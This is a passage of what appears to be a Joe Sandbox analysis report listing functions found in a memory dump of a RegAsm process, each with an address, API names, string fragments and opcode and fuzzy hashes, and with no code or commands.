                                                                                                Function 00429739 Relevance: 2.8, Strings: 2, Instructions: 308COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (. 7$,7
                                                                                                • API String ID: 0-1315767106
                                                                                                • Opcode ID: 3dc14f1719d0dcaf1c8e7808f16df868dad44d99b75b9089029e889b2ab59045
                                                                                                • Instruction ID: aca24a6d404cff65d8132a2c5354bf9a6b34cab982d47b5a163a498561acaf8d
                                                                                                • Opcode Fuzzy Hash: 3dc14f1719d0dcaf1c8e7808f16df868dad44d99b75b9089029e889b2ab59045
                                                                                                • Instruction Fuzzy Hash: 73A1DFB190C3519FC714DF25D85262BBBE2EF86314F44892DF4D58B392E738A841CB5A
                                                                                                Function 0041B8F6 Relevance: 1.7, Strings: 1, Instructions: 477COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: EWC`
                                                                                                • API String ID: 0-1922773688
                                                                                                • Opcode ID: 96f336dbcf29f94cd9f9a1eaede8d54ada638bb942813ff3d340c66f321929fb
                                                                                                • Instruction ID: 3092ec9d695e803f581415aef64df2e1d782c7e4da9fd3e94958caedbaf0e785
                                                                                                • Opcode Fuzzy Hash: 96f336dbcf29f94cd9f9a1eaede8d54ada638bb942813ff3d340c66f321929fb
                                                                                                • Instruction Fuzzy Hash: 20D11F746047028BC3358F28C4A26A3BBF2EF96304F18542ED5C78BB91E739E846C794
                                                                                                Function 0042D17D Relevance: 1.7, APIs: 1, Instructions: 152COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(1A11171A), ref: 0042D2A4
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID:
                                                                                                • API String ID: 3664257935-0
                                                                                                • Opcode ID: 78db4c3670b02004b5ce09dd30d6be68ef6f26a73c645ae10e47e490a35e64f0
                                                                                                • Instruction ID: 8c0201977aaad96103e3db66e91fe0e05dd0d7e7661fbda8aa4fd031d2e77fc5
                                                                                                • Opcode Fuzzy Hash: 78db4c3670b02004b5ce09dd30d6be68ef6f26a73c645ae10e47e490a35e64f0
                                                                                                • Instruction Fuzzy Hash: 1B41F3706043828BE3158F34D9A0B63BFE0EF57318F28869DE5D64B393D63998068769
                                                                                                Function 0042D34A Relevance: 1.6, Strings: 1, Instructions: 398COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ><+
                                                                                                • API String ID: 0-2918635699
                                                                                                • Opcode ID: 3980c0afaf6dac2d4ca75895f3ce9cc4aa60152e4397ff49cad2d9ebd5e9afb7
                                                                                                • Instruction ID: 444f218a8ad5829191449d1546b31e79214a0b4c0f4cfb8ef7368535fe843fa0
                                                                                                • Opcode Fuzzy Hash: 3980c0afaf6dac2d4ca75895f3ce9cc4aa60152e4397ff49cad2d9ebd5e9afb7
                                                                                                • Instruction Fuzzy Hash: 72C1E575A047418FD725CF2AD490762FBE2BF9A310F28859EC4DA8B752C739E806CB54
                                                                                                Function 0042B170 Relevance: 1.6, Strings: 1, Instructions: 396COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: "
                                                                                                • API String ID: 0-123907689
                                                                                                • Opcode ID: d05c80c795993c871168dd86f7d1ea5d1d218413b04f758d20a6faf4e3c25647
                                                                                                • Instruction ID: f2fd7e02527a425c6081b095c58e6bcd0ab65349b2e1505f4c1e2091d8d38838
                                                                                                • Opcode Fuzzy Hash: d05c80c795993c871168dd86f7d1ea5d1d218413b04f758d20a6faf4e3c25647
                                                                                                • Instruction Fuzzy Hash: 82C15872B043256BD711CE25E49076BB7D5EF84314F98892FE8958B382E738EC4487DA
                                                                                                Function 00429E80 Relevance: 1.6, APIs: 1, Instructions: 125COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 00429F6C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID:
                                                                                                • API String ID: 237503144-0
                                                                                                • Opcode ID: bf0f97b787aa3901fc489b07fc1f7d675bb90a5acac53e645be6843c85619458
                                                                                                • Instruction ID: 56439e7850811f5116bb8c84f174b1b770b1ea540e4d3f3412480b83843e5581
                                                                                                • Opcode Fuzzy Hash: bf0f97b787aa3901fc489b07fc1f7d675bb90a5acac53e645be6843c85619458
                                                                                                • Instruction Fuzzy Hash: B141C1B454C341CFD3109F20A98166BBBF4EB86718F10487DE5969B292D735E507CB8B
                                                                                                Function 00416F52 Relevance: 1.6, Strings: 1, Instructions: 331COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: t
                                                                                                • API String ID: 0-2238339752
                                                                                                • Opcode ID: 039beb9b53b4255e9ee2e6f2bbcbd7cde69c3a8df900983a1a0d2cd4bed9f5c8
                                                                                                • Instruction ID: 1cd3e92b5432f2ec1c5279b22e8dfdc45cf82fdb07faf4288aa06f6d08a0fcad
                                                                                                • Opcode Fuzzy Hash: 039beb9b53b4255e9ee2e6f2bbcbd7cde69c3a8df900983a1a0d2cd4bed9f5c8
                                                                                                • Instruction Fuzzy Hash: 15B187B05093818BD3358F25C9A13EBBBE0EFDA304F04896DD9C94B391EB395546CB86
                                                                                                Function 00427440 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: _^]\
                                                                                                • API String ID: 2994545307-3116432788
                                                                                                • Opcode ID: b4c7d66211ae49d8fd9eccf31c03fcf250aa2d1c5501d05c3c86452f57ff21d1
                                                                                                • Instruction ID: 2cadfa6051f0cea8981a5c3a8346752ded914f405fdfafbc00b99242be117cb3
                                                                                                • Opcode Fuzzy Hash: b4c7d66211ae49d8fd9eccf31c03fcf250aa2d1c5501d05c3c86452f57ff21d1
                                                                                                • Instruction Fuzzy Hash: 1A714B75B0C3205BD7149B29EC9273BB7A1DF86318F58843EE58697382E23CDC45835A
                                                                                                Function 00425F1B Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: _^]\
                                                                                                • API String ID: 0-3116432788
                                                                                                • Opcode ID: 18627fe42d59fa6849b5f8a45ac1d7137aaf139f75de676eaf8c8d08dd2ee1c0
                                                                                                • Instruction ID: 4542599af833d18a30e416191cc565c9845a3175e58f9edfc757ba35f46fda4c
                                                                                                • Opcode Fuzzy Hash: 18627fe42d59fa6849b5f8a45ac1d7137aaf139f75de676eaf8c8d08dd2ee1c0
                                                                                                • Instruction Fuzzy Hash: 8F714775A0C3508BD324CF68D89166BB7E1EFC5304F59486DE8C597362EB789842CB8A
                                                                                                Function 0043CA40 Relevance: 1.5, Strings: 1, Instructions: 249COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: _^]\
                                                                                                • API String ID: 2994545307-3116432788
                                                                                                • Opcode ID: a83dfb6a84884be77bbdeb245f1cea9c60f563621f19ebf7a2bdccf3372ac9f2
                                                                                                • Instruction ID: 696eb795723ead0f6ba9be3735fd8be620dffa71c9a4400ef3d7ad22a9e3dc13
                                                                                                • Opcode Fuzzy Hash: a83dfb6a84884be77bbdeb245f1cea9c60f563621f19ebf7a2bdccf3372ac9f2
                                                                                                • Instruction Fuzzy Hash: C2712871A043014FDB1CDF28CCE162FBB92EB8A710F19A63EE496E7395D6349C418789
                                                                                                Function 0042C0E6 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: N&
                                                                                                • API String ID: 0-3274356042
                                                                                                • Opcode ID: 8fff828ef7096bc6de3c5e3531ef3bcfddfa3f41189f47e61279592947ff70fd
                                                                                                • Instruction ID: 81471823a485b6705c349d61d83959a7e20011983708bf5e147628ffe1b1dd5e
                                                                                                • Opcode Fuzzy Hash: 8fff828ef7096bc6de3c5e3531ef3bcfddfa3f41189f47e61279592947ff70fd
                                                                                                • Instruction Fuzzy Hash: DE51F625604B904BD729CB3A98513B7BBD3ABDB310B58969EC4D7C7786CA3CE4068B14
                                                                                                Function 0042C09E Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: N&
                                                                                                • API String ID: 0-3274356042
                                                                                                • Opcode ID: 09941e67317fc8cb3ce7ea217b500117e96f00fb937d19bfefd61d270a526b4e
                                                                                                • Instruction ID: e5864593d1339f498270878ef60363620a1941cd2fe9c21c7a7607c55bfa5eb6
                                                                                                • Opcode Fuzzy Hash: 09941e67317fc8cb3ce7ea217b500117e96f00fb937d19bfefd61d270a526b4e
                                                                                                • Instruction Fuzzy Hash: B2512925604B904AD729CB3A98513B77BD3AF9B310F9C969DC4D7C7B86CA3C94028B15
                                                                                                Function 00441160 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @
                                                                                                • API String ID: 0-2766056989
                                                                                                • Opcode ID: 1bf28d208f4d471862e62771911b4b91396caa8be407dd285211548932c35c82
                                                                                                • Instruction ID: 1aa89e2f6171c8b600b289c24d78a6f9a5b4d57d8403bbd31509dc912f19ad9e
                                                                                                • Opcode Fuzzy Hash: 1bf28d208f4d471862e62771911b4b91396caa8be407dd285211548932c35c82
                                                                                                • Instruction Fuzzy Hash: 0D4123B19043109BE714CF54CC56B7BBBA1FFD5354F088A2DE5855B3A0E3799844C78A
                                                                                                Function 00441720 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: =<32
                                                                                                • API String ID: 2994545307-852023076
                                                                                                • Opcode ID: 806326fabb1518b066f083a03506ad00710994454575a613e60301918d7e52c2
                                                                                                • Instruction ID: 3b6fc7dbca8d43659897c6c89a338d9db0430b3797e073dd088a6240ba40644d
                                                                                                • Opcode Fuzzy Hash: 806326fabb1518b066f083a03506ad00710994454575a613e60301918d7e52c2
                                                                                                • Instruction Fuzzy Hash: 7A314438608304ABF714AE159C91B3BB3A6EB85750F18852EE695573F1D738DC90878A
                                                                                                Function 0042C465 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: AB@|
                                                                                                • API String ID: 0-3627600888
                                                                                                • Opcode ID: f041e5b4f18625dfaa42653504e20addc449c282f38dd463f45fba843b59f9ad
                                                                                                • Instruction ID: 9d680adfff61346dbcddf561b221a097d06f6077c5c56bfff523f23a55ee5db6
                                                                                                • Opcode Fuzzy Hash: f041e5b4f18625dfaa42653504e20addc449c282f38dd463f45fba843b59f9ad
                                                                                                • Instruction Fuzzy Hash: 634106B15046928FD7228F39C850767FBE1BF97310B189699D0D28B796C738E845CB54
                                                                                                Function 0043C830 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$z
                                                                                                • API String ID: 0-542936926
                                                                                                • Opcode ID: 56022ef5e62e296913ac47c6de968db9b320837307f66e6c85d4f38a5b4770bc
                                                                                                • Instruction ID: 598e6e7b5ab3f32ace4510c997d5c2914f2054150b2e0cbc2781ed5d43e0899f
                                                                                                • Opcode Fuzzy Hash: 56022ef5e62e296913ac47c6de968db9b320837307f66e6c85d4f38a5b4770bc
                                                                                                • Instruction Fuzzy Hash: 7A3104B2A193114BD314DF24CC8471BBBD2EB89714F0A992DE484A7342D37A9C428BDA
                                                                                                Function 00428528 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: _^]\
                                                                                                • API String ID: 0-3116432788
                                                                                                • Opcode ID: f6a8d254ef2cb00699e79095288bd1bdad4cbdf7a23a769f2daf49ab799d3e86
                                                                                                • Instruction ID: fa1734f8cecfd62dbfa6e1ffd5af071ca539f15cf05182bc01822064141da677
                                                                                                • Opcode Fuzzy Hash: f6a8d254ef2cb00699e79095288bd1bdad4cbdf7a23a769f2daf49ab799d3e86
                                                                                                • Instruction Fuzzy Hash: 9C21EC7470A2109BD71C8B34DC91B3F73A3FBC6314F69152ED193527A6CB399852468D
                                                                                                Function 00421A10 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,-
                                                                                                • API String ID: 0-1027024164
                                                                                                • Opcode ID: e841ffa07ed1daa646f5eb3df3353fcb7b3331a6bb754204e02c01eb04e9c511
                                                                                                • Instruction ID: 3df528e0a1c1aaf7ae1dd87ce3c0daf4cbce6c1de34562fe1b5624c5cc0b1623
                                                                                                • Opcode Fuzzy Hash: e841ffa07ed1daa646f5eb3df3353fcb7b3331a6bb754204e02c01eb04e9c511
                                                                                                • Instruction Fuzzy Hash: E8216A61A153108BC7109F29CC52537B7B1EF92364F85861EE4828B361F778CD05C79B
                                                                                                Function 00440340 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: @
                                                                                                • API String ID: 2994545307-2766056989
                                                                                                • Opcode ID: 6ebeeff5786163907a1946c8d73bc8e49d379f446760a2416b3547ff48868a07
                                                                                                • Instruction ID: 33784d5b8146ae1d6e83e41184c2528a054757f8bcb0ba64dcdd6e2a9e18c57c
                                                                                                • Opcode Fuzzy Hash: 6ebeeff5786163907a1946c8d73bc8e49d379f446760a2416b3547ff48868a07
                                                                                                • Instruction Fuzzy Hash: 1831FF756083048BE314DF58D8C266FBBE4EBC5324F14892DEA9883390D739D858CB9A
                                                                                                Function 0042DE07 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ses`
                                                                                                • API String ID: 0-1601344200
                                                                                                • Opcode ID: 7ecea65e69f80fd34ed937d50154ad00ae80800854f723ecc4b508468e07b142
                                                                                                • Instruction ID: c16a7131854b6aed293f14fd3f65d90cfdcd1604bceaaf5e70633509fa898857
                                                                                                • Opcode Fuzzy Hash: 7ecea65e69f80fd34ed937d50154ad00ae80800854f723ecc4b508468e07b142
                                                                                                • Instruction Fuzzy Hash: AD110B645046528BEB168F359C55726BBF1AF33354F1892DCD0D1DF292D624C442CB28
                                                                                                Function 0042DDFF Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ses`
                                                                                                • API String ID: 0-1601344200
                                                                                                • Opcode ID: acdcb12a599db5bd8b29fdd08185f7d8639ff27a1d18159ef2967bd0d873cb9e
                                                                                                • Instruction ID: 2b194369684db8568e4cc4b10858fb41ea2ffb87a76b3f2bea81f07ece6f04e6
                                                                                                • Opcode Fuzzy Hash: acdcb12a599db5bd8b29fdd08185f7d8639ff27a1d18159ef2967bd0d873cb9e
                                                                                                • Instruction Fuzzy Hash: 21014EA46446538BE7128F359C15726FBF1EF33350F18E2A8D091DF2A2D634C842CB18
                                                                                                Function 004289E9 Relevance: 1.3, Strings: 1, Instructions: 51COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: _^]\
                                                                                                • API String ID: 0-3116432788
                                                                                                • Opcode ID: 7248b21c1a5d66122527e099d388fada2b713c8df9422b832066424d84c6be5f
                                                                                                • Instruction ID: a8dfba8dee4ad149da4611bc05b701b5a33fd88c903e8634cd43ba9cb2d750ed
                                                                                                • Opcode Fuzzy Hash: 7248b21c1a5d66122527e099d388fada2b713c8df9422b832066424d84c6be5f
                                                                                                • Instruction Fuzzy Hash: ED01D6B0B0A32187D708CB15D49162FB7E2BBCA310F195A2ED0D623755C738E84287CE
                                                                                                Function 0043FA20 Relevance: .7, Instructions: 685COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6c171becab70a86a6e575e69f5b8f9388b08847a9ebf173f34fd08f30fb17e69
                                                                                                • Instruction ID: 15bf1ea58ee97730c61fd6eda894784fa47516086410607d7a072294ae37ca60
                                                                                                • Opcode Fuzzy Hash: 6c171becab70a86a6e575e69f5b8f9388b08847a9ebf173f34fd08f30fb17e69
                                                                                                • Instruction Fuzzy Hash: DB22243AB54211CFDB08CF78D8A12AAB3E2FF8A314F1A857DC94697351D7389851CB85
                                                                                                Function 00402EB0 Relevance: .7, Instructions: 664COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9edad3ee9539bfad45d948b53ca40223dce90882209d286bf0c99f9c6cd7d631
                                                                                                • Instruction ID: 4eb073694aac07531e4e37dd991e5aaa8cdb99ba0f72cd08d303837d400a2551
                                                                                                • Opcode Fuzzy Hash: 9edad3ee9539bfad45d948b53ca40223dce90882209d286bf0c99f9c6cd7d631
                                                                                                • Instruction Fuzzy Hash: 3552F5715083458FCB15CF24C0906AABFE1BF89305F188A7EF8996B381D779D949CB89
                                                                                                Function 004073D0 Relevance: .6, Instructions: 625COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6e797157fb35717b6a91bbe19d3c6782b16ec68ef1e5ad1ec3f47f605a4e618f
                                                                                                • Instruction ID: 6123c4b066af5df033588bdcadea87e91db6a899c9f8ce647c920f563282eda9
                                                                                                • Opcode Fuzzy Hash: 6e797157fb35717b6a91bbe19d3c6782b16ec68ef1e5ad1ec3f47f605a4e618f
                                                                                                • Instruction Fuzzy Hash: E322A472A087118BD725DF18D8806ABB3E1BFC4319F19893ED986A7385D738B811CB57
                                                                                                Function 0043FB10 Relevance: .5, Instructions: 537COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5b217010d00d36b6e532b914cc2c8748e4c1d1399e6fa795548d92cd5122fdeb
                                                                                                • Instruction ID: bc1c9a79bd48fbe04f38ca9b4e00e2ed040d16652403f2f97064ad5dbaff0f70
                                                                                                • Opcode Fuzzy Hash: 5b217010d00d36b6e532b914cc2c8748e4c1d1399e6fa795548d92cd5122fdeb
                                                                                                • Instruction Fuzzy Hash: 9502483AB54211CFD708CF78D8E02AAB7A2FF8A314F1A857DC94693351D739A851CB85
                                                                                                Function 0043FB2A Relevance: .5, Instructions: 527COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c87e449dc06f3ba1431d52dba96a7b849506db30f3e9f92c5d405e1d6b40a5de
                                                                                                • Instruction ID: a1c715d08816259ade05fabf2ed31b4fea3a659fa95dcf98a80d69cb0f26fb97
                                                                                                • Opcode Fuzzy Hash: c87e449dc06f3ba1431d52dba96a7b849506db30f3e9f92c5d405e1d6b40a5de
                                                                                                • Instruction Fuzzy Hash: 59F13939B54211CFD708CF78D8E02AAB3A2FF8A314F1A857DC94693351D735A851CB85
                                                                                                Function 0043FB28 Relevance: .5, Instructions: 526COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3a977913465e41e9bc8fdf4fe2f93bdf54fd14983a5a5a95a9e13933d6850651
                                                                                                • Instruction ID: 7c816634e29e8635841472aa4442699fe105e1924a6df37b46faa06d9bb3fd90
                                                                                                • Opcode Fuzzy Hash: 3a977913465e41e9bc8fdf4fe2f93bdf54fd14983a5a5a95a9e13933d6850651
                                                                                                • Instruction Fuzzy Hash: 87F13939B54211CFDB08CF78D8E02AAB3A2FF8A314F19857DC94693351D739A851CB85
                                                                                                Function 0041D8AC Relevance: .5, Instructions: 505COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000002D.00000002.1861022200.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_45_2_400000_RegAsm.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 80d8542304fd61a6ec4704e93bd93ae71f34bee62e8590f6df1c4416f41d4fae
                                                                                                • Instruction ID: 5e9d7e84427f8d5228b95ea90cb98d597139ae8c2cd507701152bf7f0d2aec8f
                                                                                                • Opcode Fuzzy Hash: 80d8542304fd61a6ec4704e93bd93ae71f34bee62e8590f6df1c4416f41d4fae
